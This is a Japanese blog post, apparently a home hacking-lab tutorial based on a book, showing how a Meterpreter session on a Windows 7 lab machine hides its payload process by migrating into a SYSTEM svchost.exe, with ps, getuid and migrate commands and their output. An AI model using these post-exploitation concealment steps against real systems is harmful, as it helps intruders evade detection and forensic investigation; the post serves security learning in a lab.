攻撃を行うと、ログだけではなくプロセスがターゲット端末側で見えるため、プロセスからも攻撃されていることを判別される可能性があります。
ペイロード(evil.exe)を実行したり、 getsystem で権限昇格してセッションを確立すると、Windows 7側でそれらのプロセスを確認できます。
getsystem 実行時のプロセス
ここでは、getsystem でセッション確立した際に表示されるプロセスを隠蔽します。
meterpreter で ps コマンドを実行することで、ターゲット端末の実行プロセスを確認することができます。
getsystem 実行前後の ps コマンド結果を比較すると、以下プロセスが生成されていました。
4044 4016 ZXFuwXIzvnY.exe x86 1 IE8WIN7\IEUser C:\Users\IEUser\AppData\Local\Temp\ZXFuwXIzvnY.exeプロセスの隠蔽
migrate コマンドを使用することで、プロセスの隠蔽をすることができます。具体的には、実行プロンプトのプロセスを指定したプロセスに統合することで隠蔽を行います。
統合先のプロセスは、現在の権限以下のプロセスを指定する必要があります。そのため、まずはじめに現在の権限を確認します。
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >このように、SYSTEM権限であることがわかります。
ps コマンドで SYSTEM 権限のプロセスを見つけたので、こちらのプロセスに現在のプロセスを統合します。
2940 436 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe以下のコマンドを実行することでプロセスの統合を行います。
meterpreter > migrate 2940
[*] Migrating from 4044 to 2940...
[*] Migration completed successfully.
meterpreter >コマンドの実行に成功したので、再度 ps コマンドを実行し、はじめに確認したプロセス「 ZXFuwXIzvnY.exe 」が隠蔽されているかを確認します。
meterpreter > ps grep | ZXFuwXIzvnY.exe
Filtering on 'ZXFuwXIzvnY.exe'
No matching processes were found.
meterpreter >このように、「 ZXFuwXIzvnY.exe 」は見つからず隠蔽されていました。
前回はログの消去、今回はプロセスの隠蔽を行いました。
攻撃して終わりではなく、このようにいかに証跡を残さず追跡の手を逃れるかといったことを攻撃側は常に考えているということを意識することが大切ですね。
くどり
この記事は「ハッキング・ラボのつくりかた 第4章 」をベースに作成しています。購入リンクは以下です。
※Amazonアソシエイトを使用しています。
コメント